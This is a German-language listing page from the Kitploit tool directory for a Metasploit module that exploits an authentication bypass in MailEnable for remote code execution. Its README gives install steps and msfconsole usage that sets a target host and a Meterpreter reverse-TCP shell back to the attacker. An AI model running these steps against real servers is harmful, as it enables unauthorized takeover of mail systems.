Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mailenable-cve-2022-36934 — Metasploit-Modul für MailEnable CVE-2022-36934 Authentication-Bypass-RCE | Kitploit
Tools/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

Metasploit-Modul für MailEnable CVE-2022-36934 Authentication-Bypass-RCE

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MailEnable CVE-2022-36934 Exploit-Modul

Metasploit License

Metasploit-Modul für die Authentifizierungsumgehungs-Sicherheitslücke (CVE-2022-36934) in MailEnable, die zu Remote-Code-Ausführung führt.

📌 Funktionen

  • Nutzt die unsachgemäße Eingabebereinigung von MailEnable in SMTP/POP3 aus
  • Unterstützt sowohl x86- als auch x64-Windows-Ziele
  • Keine Benutzerinteraktion erforderlich (automatisch per präparierter E-Mail ausgelöst)
  • Funktioniert mit MailEnable-Versionen < 10.40

🚀 Installation

  1. Kopieren in das Metasploit-Module-Verzeichnis:
    root@kitploit:~
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. Module in msfconsole neu laden:

reload_all

  1. Verwendung:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 Getestet gegen:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 Technische Details:

Sicherheitslücke: Authentifizierungsumgehung mittels SQLi-ähnlicher Syntax in SMTP/POP3

Angriffsvektor: Netzwerk (Ports 25/110)

Berechtigungen: Läuft als MailEnable-Dienstkonto (oft SYSTEM)

⚠️ Rechtlicher Hinweis:

Dieses Tool ist nur für autorisierte Tests bestimmt. Verwenden Sie es niemals gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen